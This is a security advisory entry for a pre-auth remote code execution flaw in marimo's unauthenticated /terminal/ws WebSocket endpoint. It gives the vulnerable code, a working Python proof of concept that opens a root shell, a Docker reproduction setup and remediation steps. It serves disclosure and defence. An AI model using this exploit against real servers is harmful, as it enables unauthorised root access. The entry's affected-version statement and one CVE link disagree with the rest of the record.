PYSEC-2026-407
Vulnerability from pysec - Published: 2026-06-29 11:50 - Updated: 2026-06-29 12:05
VLAI
Details
Summary
Marimo (19.6k stars) has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands.
Unlike other WebSocket endpoints (e.g., /ws) that correctly call validate_auth() for authentication, the /terminal/ws endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification.
Affected Versions
Marimo <= 0.20.4
Vulnerability Details
Root Cause: Terminal WebSocket Missing Authentication
marimo/_server/api/endpoints/terminal.py lines 340-356:
@router.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket) -> None:
app_state = AppState(websocket)
if app_state.mode != SessionMode.EDIT:
await websocket.close(...)
return
if not supports_terminal():
await websocket.close(...)
return
# No authentication check!
await websocket.accept() # Accepts connection directly
# ...
child_pid, fd = pty.fork() # Creates PTY shell
Compare with the correctly implemented /ws endpoint (ws_endpoint.py lines 67-82):
@router.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket) -> None:
app_state = AppState(websocket)
validator = WebSocketConnectionValidator(websocket, app_state)
if not await validator.validate_auth(): # Correct auth check
return
```
### Authentication Middleware Limitation
Marimo uses Starlette's `AuthenticationMiddleware`, which marks failed auth connections as `UnauthenticatedUser` but does NOT actively reject WebSocket connections. Actual auth enforcement relies on endpoint-level `@requires()` decorators or `validate_auth()` calls.
The `/terminal/ws` endpoint has neither a `@requires("edit")` decorator nor a `validate_auth()` call, so unauthenticated WebSocket connections are accepted even when the auth middleware is active.
### Attack Chain
1. WebSocket connect to `ws://TARGET:2718/terminal/ws` (no auth needed)
2. `websocket.accept()` accepts the connection directly
3. `pty.fork()` creates a PTY child process
4. Full interactive shell with arbitrary command execution
5. Commands run as root in default Docker deployments
A single WebSocket connection yields a complete interactive shell.
## Proof of Concept
```python
import websocket
import time
# Connect without any authentication
ws = websocket.WebSocket()
ws.connect('ws://TARGET:2718/terminal/ws')
time.sleep(2)
# Drain initial output
try:
while True:
ws.settimeout(1)
ws.recv()
except:
pass
# Execute arbitrary command
ws.settimeout(10)
ws.send('id\n')
time.sleep(2)
print(ws.recv()) # uid=0(root) gid=0(root) groups=0(root)
ws.close()
### Reproduction Environment
FROM python:3.12-slim
RUN pip install --no-cache-dir marimo==0.20.4
RUN mkdir -p /app/notebooks
RUN echo 'import marimo as mo; app = mo.App()' > /app/notebooks/test.py
WORKDIR /app/notebooks
EXPOSE 2718
CMD ["marimo", "edit", "--host", "0.0.0.0", "--port", "2718", "."]
Reproduction Result
With auth enabled (server generates random access_token), the exploit bypasses authentication entirely:
$ python3 exp.py http://127.0.0.1:2718 exec "id && whoami && hostname"
[+] No auth needed! Terminal WebSocket connected
[+] Output:
uid=0(root) gid=0(root) groups=0(root)
root
ddfc452129c3
Suggested Remediation
- Add authentication validation to
/terminal/wsendpoint, consistent with/wsusingWebSocketConnectionValidator.validate_auth() - Apply unified authentication decorators or middleware interception to all WebSocket endpoints
- Terminal functionality should only be available when explicitly enabled, not on by default
Impact
An unauthenticated attacker can obtain a full interactive root shell on the server via a single WebSocket connection. No user interaction or authentication token is required, even when authentication is enabled on the marimo instance.
Severity
9.8 (Critical)
Impacted products
| Name | purl | marimo |
|---|
Aliases
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "marimo"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.23.0"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.0.0",
"0.1.0",
"0.1.1",
"0.1.10",
"0.1.11",
"0.1.12",
"0.1.13",
"0.1.14",
"0.1.15",
"0.1.17",
"0.1.18",
"0.1.19",
"0.1.2",
"0.1.20",
"0.1.21",
"0.1.22",
"0.1.23",
"0.1.24",
"0.1.25",
"0.1.26",
"0.1.28",
"0.1.29",
"0.1.3",
"0.1.30",
"0.1.31",
"0.1.32",
"0.1.33",
"0.1.34",
"0.1.35",
"0.1.36",
"0.1.37",
"0.1.38",
"0.1.39",
"0.1.4",
"0.1.40",
"0.1.41",
"0.1.42",
"0.1.43",
"0.1.44",
"0.1.45",
"0.1.46",
"0.1.47",
"0.1.48",
"0.1.49",
"0.1.5",
"0.1.50",
"0.1.51",
"0.1.52",
"0.1.53",
"0.1.54",
"0.1.55",
"0.1.56",
"0.1.57",
"0.1.58",
"0.1.59",
"0.1.6",
"0.1.60",
"0.1.61",
"0.1.62",
"0.1.63",
"0.1.64",
"0.1.65",
"0.1.66",
"0.1.67",
"0.1.68",
"0.1.69",
"0.1.7",
"0.1.70",
"0.1.71",
"0.1.72",
"0.1.73",
"0.1.74",
"0.1.75",
"0.1.76",
"0.1.77",
"0.1.78",
"0.1.79",
"0.1.8",
"0.1.80",
"0.1.81",
"0.1.82",
"0.1.83",
"0.1.84",
"0.1.85",
"0.1.86",
"0.1.87",
"0.1.88",
"0.1.9",
"0.10.0",
"0.10.1",
"0.10.10",
"0.10.11",
"0.10.12",
"0.10.13",
"0.10.14",
"0.10.15",
"0.10.16",
"0.10.18",
"0.10.19",
"0.10.2",
"0.10.4",
"0.10.5",
"0.10.6",
"0.10.7",
"0.10.8",
"0.10.9",
"0.11.0",
"0.11.1",
"0.11.10",
"0.11.11",
"0.11.12",
"0.11.13",
"0.11.14",
"0.11.15",
"0.11.16",
"0.11.17",
"0.11.18",
"0.11.19",
"0.11.2",
"0.11.20",
"0.11.21",
"0.11.22",
"0.11.23",
"0.11.24",
"0.11.26",
"0.11.27",
"0.11.28",
"0.11.29",
"0.11.3",
"0.11.30",
"0.11.31",
"0.11.4",
"0.11.5",
"0.11.6",
"0.11.7",
"0.11.8",
"0.11.9",
"0.12.0",
"0.12.1",
"0.12.10",
"0.12.2",
"0.12.3",
"0.12.4",
"0.12.5",
"0.12.6",
"0.12.7",
"0.12.8",
"0.13.0",
"0.13.1",
"0.13.10",
"0.13.11",
"0.13.12",
"0.13.13",
"0.13.14",
"0.13.15",
"0.13.2",
"0.13.3",
"0.13.6",
"0.13.7",
"0.13.8",
"0.13.9",
"0.14.0",
"0.14.1",
"0.14.10",
"0.14.11",
"0.14.12",
"0.14.13",
"0.14.14",
"0.14.15",
"0.14.16",
"0.14.17",
"0.14.2",
"0.14.3",
"0.14.4",
"0.14.5",
"0.14.6",
"0.14.7",
"0.14.8",
"0.14.9",
"0.15.0",
"0.15.1",
"0.15.2",
"0.15.3",
"0.15.4",
"0.15.5",
"0.16.0",
"0.16.1",
"0.16.2",
"0.16.3",
"0.16.4",
"0.16.5",
"0.17.0",
"0.17.1",
"0.17.2",
"0.17.3",
"0.17.4",
"0.17.5",
"0.17.6",
"0.17.7",
"0.17.8",
"0.18.0",
"0.18.1",
"0.18.2",
"0.18.3",
"0.18.4",
"0.19.0",
"0.19.1",
"0.19.10",
"0.19.11",
"0.19.2",
"0.19.3",
"0.19.4",
"0.19.5",
"0.19.6",
"0.19.7",
"0.19.8",
"0.19.9",
"0.2.0",
"0.2.1",
"0.2.10",
"0.2.11",
"0.2.12",
"0.2.13",
"0.2.2",
"0.2.4",
"0.2.5",
"0.2.6",
"0.2.7",
"0.2.8",
"0.2.9",
"0.20.0",
"0.20.1",
"0.20.2",
"0.20.3",
"0.20.4",
"0.21.0",
"0.21.1",
"0.22.0",
"0.22.3",
"0.22.4",
"0.22.5",
"0.3.0",
"0.3.1",
"0.3.10",
"0.3.11",
"0.3.12",
"0.3.2",
"0.3.3",
"0.3.4",
"0.3.5",
"0.3.7",
"0.3.8",
"0.3.9",
"0.4.0",
"0.4.1",
"0.4.10",
"0.4.11",
"0.4.2",
"0.4.3",
"0.4.4",
"0.4.5",
"0.4.6",
"0.5.0",
"0.5.1",
"0.5.2",
"0.6.0",
"0.6.1",
"0.6.10",
"0.6.11",
"0.6.12",
"0.6.13",
"0.6.14",
"0.6.15",
"0.6.16",
"0.6.17",
"0.6.18",
"0.6.19",
"0.6.2",
"0.6.20",
"0.6.21",
"0.6.22",
"0.6.23",
"0.6.24",
"0.6.25",
"0.6.26",
"0.6.3",
"0.6.4",
"0.6.5",
"0.6.6",
"0.6.7",
"0.6.8",
"0.6.9",
"0.7.0",
"0.7.1",
"0.7.10",
"0.7.11",
"0.7.12",
"0.7.13",
"0.7.14",
"0.7.15",
"0.7.16",
"0.7.17",
"0.7.18",
"0.7.19",
"0.7.2",
"0.7.20",
"0.7.3",
"0.7.4",
"0.7.5",
"0.7.6",
"0.7.7",
"0.7.8",
"0.7.9",
"0.8.0",
"0.8.1",
"0.8.10",
"0.8.11",
"0.8.12",
"0.8.13",
"0.8.14",
"0.8.15",
"0.8.16",
"0.8.17",
"0.8.18",
"0.8.19",
"0.8.2",
"0.8.20",
"0.8.21",
"0.8.22",
"0.8.3",
"0.8.5",
"0.8.6",
"0.8.7",
"0.8.8",
"0.8.9",
"0.9.0",
"0.9.1",
"0.9.10",
"0.9.11",
"0.9.12",
"0.9.13",
"0.9.14",
"0.9.15",
"0.9.16",
"0.9.17",
"0.9.18",
"0.9.19",
"0.9.2",
"0.9.20",
"0.9.21",
"0.9.22",
"0.9.23",
"0.9.24",
"0.9.25",
"0.9.26",
"0.9.27",
"0.9.28",
"0.9.29",
"0.9.3",
"0.9.30",
"0.9.31",
"0.9.32",
"0.9.33",
"0.9.34",
"0.9.4",
"0.9.5",
"0.9.6",
"0.9.7",
"0.9.8",
"0.9.9"
]
}
],
"aliases": [
"CVE-2026-39987",
"GHSA-2679-6mx9-h9xc"
],
"details": "## Summary\n\nMarimo (19.6k stars) has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint `/terminal/ws` lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands.\n\nUnlike other WebSocket endpoints (e.g., `/ws`) that correctly call `validate_auth()` for authentication, the `/terminal/ws` endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification.\n\n## Affected Versions\n\nMarimo \u003c= 0.20.4 \n\n## Vulnerability Details\n\n### Root Cause: Terminal WebSocket Missing Authentication\n \n`marimo/_server/api/endpoints/terminal.py` lines 340-356:\n\n```python\n@router.websocket(\"/ws\")\nasync def websocket_endpoint(websocket: WebSocket) -\u003e None:\n app_state = AppState(websocket)\n if app_state.mode != SessionMode.EDIT:\n await websocket.close(...)\n return\n if not supports_terminal():\n await websocket.close(...)\n return\n # No authentication check!\n await websocket.accept() # Accepts connection directly\n # ...\n child_pid, fd = pty.fork() # Creates PTY shell\n```\n\nCompare with the correctly implemented `/ws` endpoint (`ws_endpoint.py` lines 67-82):\n\n```python\n@router.websocket(\"/ws\")\nasync def websocket_endpoint(websocket: WebSocket) -\u003e None:\n app_state = AppState(websocket)\n validator = WebSocketConnectionValidator(websocket, app_state)\n if not await validator.validate_auth(): # Correct auth check\n return\n ```\n\n### Authentication Middleware Limitation\n\nMarimo uses Starlette\u0027s `AuthenticationMiddleware`, which marks failed auth connections as `UnauthenticatedUser` but does NOT actively reject WebSocket connections. Actual auth enforcement relies on endpoint-level `@requires()` decorators or `validate_auth()` calls.\n\nThe `/terminal/ws` endpoint has neither a `@requires(\"edit\")` decorator nor a `validate_auth()` call, so unauthenticated WebSocket connections are accepted even when the auth middleware is active.\n\n ### Attack Chain\n\n1. WebSocket connect to `ws://TARGET:2718/terminal/ws` (no auth needed)\n2. `websocket.accept()` accepts the connection directly\n3. `pty.fork()` creates a PTY child process\n4. Full interactive shell with arbitrary command execution\n 5. Commands run as root in default Docker deployments\n\nA single WebSocket connection yields a complete interactive shell.\n\n## Proof of Concept\n\n```python\nimport websocket\nimport time\n\n# Connect without any authentication\nws = websocket.WebSocket()\nws.connect(\u0027ws://TARGET:2718/terminal/ws\u0027)\ntime.sleep(2)\n\n# Drain initial output\ntry:\n while True:\n ws.settimeout(1)\n ws.recv()\nexcept:\n pass\n\n# Execute arbitrary command\nws.settimeout(10)\nws.send(\u0027id\\n\u0027)\ntime.sleep(2)\nprint(ws.recv()) # uid=0(root) gid=0(root) groups=0(root)\nws.close()\n```\n\n ### Reproduction Environment\n\n```dockerfile\nFROM python:3.12-slim\nRUN pip install --no-cache-dir marimo==0.20.4\nRUN mkdir -p /app/notebooks\nRUN echo \u0027import marimo as mo; app = mo.App()\u0027 \u003e /app/notebooks/test.py\nWORKDIR /app/notebooks\nEXPOSE 2718\nCMD [\"marimo\", \"edit\", \"--host\", \"0.0.0.0\", \"--port\", \"2718\", \".\"]\n```\n\n### Reproduction Result\n\nWith auth enabled (server generates random `access_token`), the exploit bypasses authentication entirely:\n\n```\n$ python3 exp.py http://127.0.0.1:2718 exec \"id \u0026\u0026 whoami \u0026\u0026 hostname\"\n[+] No auth needed! Terminal WebSocket connected\n[+] Output:\nuid=0(root) gid=0(root) groups=0(root)\n root\nddfc452129c3\n```\n\n## Suggested Remediation\n\n1. Add authentication validation to `/terminal/ws` endpoint, consistent with `/ws` using `WebSocketConnectionValidator.validate_auth()`\n 2. Apply unified authentication decorators or middleware interception to all WebSocket endpoints\n3. Terminal functionality should only be available when explicitly enabled, not on by default\n\n## Impact\n\nAn unauthenticated attacker can obtain a full interactive root shell on the server via a single WebSocket connection. No user interaction or authentication token is required, even when authentication is enabled on the marimo instance.",
"id": "PYSEC-2026-407",
"modified": "2026-06-29T12:05:35.335259Z",
"published": "2026-06-29T11:50:47.157871Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39987"
},
{
"type": "WEB",
"url": "https://github.com/marimo-team/marimo/pull/9098"
},
{
"type": "WEB",
"url": "https://github.com/marimo-team/marimo/commit/c24d4806398f30be6b12acd6c60d1d7c68cfd12a"
},
{
"type": "PACKAGE",
"url": "https://github.com/marimo-team/marimo"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-39987"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-39987"
},
{
"type": "WEB",
"url": "https://www.sysdig.com/blog/marimo-oss-python-notebook-rce-from-disclosure-to-exploitation-in-under-10-hours"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/marimo"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-2679-6mx9-h9xc"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…